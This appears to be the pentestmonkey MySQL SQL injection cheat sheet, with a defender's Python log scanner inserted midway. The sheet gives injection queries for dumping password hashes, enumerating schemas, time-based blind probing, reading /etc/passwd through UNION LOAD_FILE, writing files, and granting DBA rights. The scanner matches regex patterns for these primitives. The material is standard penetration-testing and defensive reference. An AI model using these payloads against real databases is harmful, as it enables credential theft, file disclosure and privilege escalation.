MySQL SQL Injection Cheat Sheet

Version

SELECT @@version

Comments

SELECT 1;#comment
SELECT /*comment*/1;

Current User

SELECT user();
SELECT system_user();

List Users

SELECT user FROM mysql.user; -- priv

List Password Hashes

SELECT host, user, password FROM mysql.user; -- priv

Password Cracker

John the Ripper will crack MySQL password hashes.

List Privileges

SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; -- list user privs

SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; -- priv, list user privs

SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; -- list privs on databases (schemas)

SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; -- list privs on columns

List DBA Accounts

SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER';

SELECT host,user FROM mysql.user WHERE Super_priv = 'Y'; # priv

Current Database

SELECT database()

List Databases

SELECT schema_name FROM information_schema.schemata; -- for MySQL >= v5.0

SELECT distinct(db) FROM mysql.db; -- priv

List Columns

SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema';

List Tables

SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema';

Find Tables From Column Name

SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username'; -- find tables which have a column called 'username'

Select Nth Row

SELECT host, user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0

SELECT host, user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0

Select Nth Char

SELECT substr('abcd', 3, 1); # returns c

Bitwise AND

SELECT 6 & 2; # returns 2

SELECT 6 & 1; # returns 0

ASCII Value -> Char

SELECT char(65); # returns A

Char -> ASCII Value

SELECT ascii('A'); # returns 65

Casting

SELECT cast('1' AS unsigned integer);

SELECT cast('123' AS char);

String Concatenation

SELECT CONCAT('A','B'); # returns AB

SELECT CONCAT('A','B','C'); # returns ABC

If Statement

SELECT if(1=1,'foo','bar'); -- returns 'foo'

Case Statement

SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns A

Avoiding Quotes

SELECT 0x414243; # returns ABC

Time Delay

SELECT BENCHMARK(1000000,MD5('A'));

SELECT SLEEP(5); # >= 5.0.12

Make DNS Requests

Impossible?

Command Execution

If mysqld (<5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib (or similar). The .so file should contain a User Defined Function (UDF). raptor_udf.c explains exactly how you go about this. Remember to compile for the target architecture, which may or may not be the same as your attack platform.

Local File Access

' UNION ALL SELECT LOAD_FILE('/etc/passwd') -- priv, can only read world-readable files.

SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; -- priv, write to filesystem
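As an added, defender-side example (not part of the original cheat sheet), the following Python script shows how the primitives catalogued above, the `#`, `--` and `/* */` comment forms, hex literals used to avoid quotes, `SLEEP`/`BENCHMARK` delays, `information_schema` and `mysql.user` enumeration, and `LOAD_FILE` / `INTO DUMPFILE` file access, can be picked out of MySQL general query log lines. The log lines are constructed for the example and approximate the 5.7+ general log layout, the indicator names and the `Finding` type are my own, and statements are normalised first (comments stripped, hex literals decoded) so that the obfuscation tricks on this sheet do not hide the signature.

```python
"""Detect cheat-sheet style MySQL injection primitives in general-log lines.

Constructed example; the log below is synthetic and the indicator classes are
the author's own naming, not a MySQL or vendor feature.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

# Constructed sample general query log (format: time, tab, id, " Query", tab, statement).
SAMPLE_GENERAL_LOG = (
    "2024-01-01T10:00:01.000000Z\t   12 Query\tSELECT id, name FROM products WHERE id = 7\n"
    "2024-01-01T10:00:02.000000Z\t   12 Query\tSELECT id, name FROM products WHERE id = 7 AND SLEEP(5)#\n"
    "2024-01-01T10:00:09.000000Z\t   12 Query\tSELECT id, name FROM products WHERE id = 7 "
    "UNION ALL SELECT table_schema, table_name FROM information_schema.tables -- -\n"
    "2024-01-01T10:00:10.000000Z\t   12 Query\tSELECT id, name FROM products WHERE id = 7 "
    "UNION ALL SELECT LOAD_FILE(0x2f6574632f706173737764), 1\n"
    "2024-01-01T10:00:11.000000Z\t   13 Query\tSELECT COUNT(*) FROM orders WHERE status = 'shipped'\n"
)

# Group 1 captures quoted string literals so comment markers inside strings are kept.
_STRING_OR_COMMENT = re.compile(
    r"('(?:[^'\\]|\\.)*'|\"(?:[^\"\\]|\\.)*\")"  # group 1: string literal (kept)
    r"|/\*.*?\*/"                                 # /* ... */ block comment
    r"|(?:--(?:[ \t].*?)?|#.*?)$",                # '-- ' (MySQL needs the space) or '#' to end of line
    re.DOTALL | re.MULTILINE,
)
_HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-fA-F]{2})+)\b")
_LOG_LINE = re.compile(r"^(?P<ts>\S+)\t\s*(?P<conn>\d+) Query\t(?P<sql>.*)$")

# Indicator classes drawn from the primitives on this sheet.
INDICATORS: List[Tuple[str, "re.Pattern[str]"]] = [
    ("time-based blind probe", re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I)),
    ("schema/account enumeration", re.compile(r"\binformation_schema\s*\.|\bmysql\s*\.\s*(?:user|db)\b", re.I)),
    ("server file read", re.compile(r"\bLOAD_FILE\s*\(", re.I)),
    ("server file write", re.compile(r"\bINTO\s+(?:DUMPFILE|OUTFILE)\b", re.I)),
    ("server fingerprinting", re.compile(r"@@(?:version|datadir|hostname)\b", re.I)),
]


def strip_comments(sql: str) -> str:
    """Remove #, -- and /* */ comments, keep string literals, and keep the body of
    MySQL's executable /*!NNNNN ... */ comments, which the server actually runs."""
    def repl(m) -> str:
        if m.group(1) is not None:
            return m.group(1)
        text = m.group(0)
        if text.startswith("/*!"):
            return " " + re.sub(r"^\d+", "", text[3:-2]) + " "
        return " "
    return re.sub(r"\s+", " ", _STRING_OR_COMMENT.sub(repl, sql)).strip()


def decode_hex_literals(sql: str) -> str:
    """Rewrite 0x... literals as quoted strings when they decode to printable ASCII,
    so 0x414243 is seen as 'ABC' and 0x2f6574632f706173737764 as '/etc/passwd'."""
    def repl(m) -> str:
        raw = bytes.fromhex(m.group(1))
        if all(32 <= b < 127 for b in raw):
            return "'" + raw.decode("ascii").replace("'", "''") + "'"
        return m.group(0)
    return _HEX_LITERAL.sub(repl, sql)


def normalize(sql: str) -> str:
    return decode_hex_literals(strip_comments(sql))


def classify(sql: str) -> List[str]:
    """Names of every indicator class the (normalised) statement trips."""
    norm = normalize(sql)
    return [name for name, pat in INDICATORS if pat.search(norm)]


def parse_general_log(text: str) -> List[Tuple[int, str]]:
    rows = []
    for line in text.splitlines():
        m = _LOG_LINE.match(line)
        if m:
            rows.append((int(m.group("conn")), m.group("sql")))
    return rows


@dataclass
class Finding:
    connection_id: int
    indicators: List[str]
    normalized_sql: str


def scan_general_log(text: str) -> List[Finding]:
    findings = []
    for conn, sql in parse_general_log(text):
        hits = classify(sql)
        if hits:
            findings.append(Finding(conn, hits, normalize(sql)))
    return findings


def suspicious_connections(text: str, threshold: int = 2) -> Dict[int, Set[str]]:
    """Connections that tripped at least `threshold` distinct indicator classes;
    a single hit may be a legitimate admin query, several in one session rarely are."""
    seen: Dict[int, Set[str]] = {}
    for f in scan_general_log(text):
        seen.setdefault(f.connection_id, set()).update(f.indicators)
    return {c: s for c, s in seen.items() if len(s) >= threshold}


if __name__ == "__main__":
    for f in scan_general_log(SAMPLE_GENERAL_LOG):
        print(f.connection_id, f.indicators, f.normalized_sql)
    print("suspicious:", suspicious_connections(SAMPLE_GENERAL_LOG))
```

Run against the embedded sample, connection 12 trips three distinct classes (delay, enumeration, file read) while connection 13 trips none; the same `classify` function can be applied to a web server's query-string parameters, since the normalisation step is what defeats the comment and hex tricks rather than the log format.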

Hostname, IP Address

SELECT @@hostname;

Create Users

CREATE USER test1 IDENTIFIED BY 'pass1'; -- priv

Delete Users

DROP USER test1; -- priv

Make User DBA

GRANT ALL PRIVILEGES ON *.* TO test1@'%'; -- priv

Location of DB files

SELECT @@datadir;

Default/System Databases

information_schema (>= MySQL 5.0)
mysql


Original link:
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet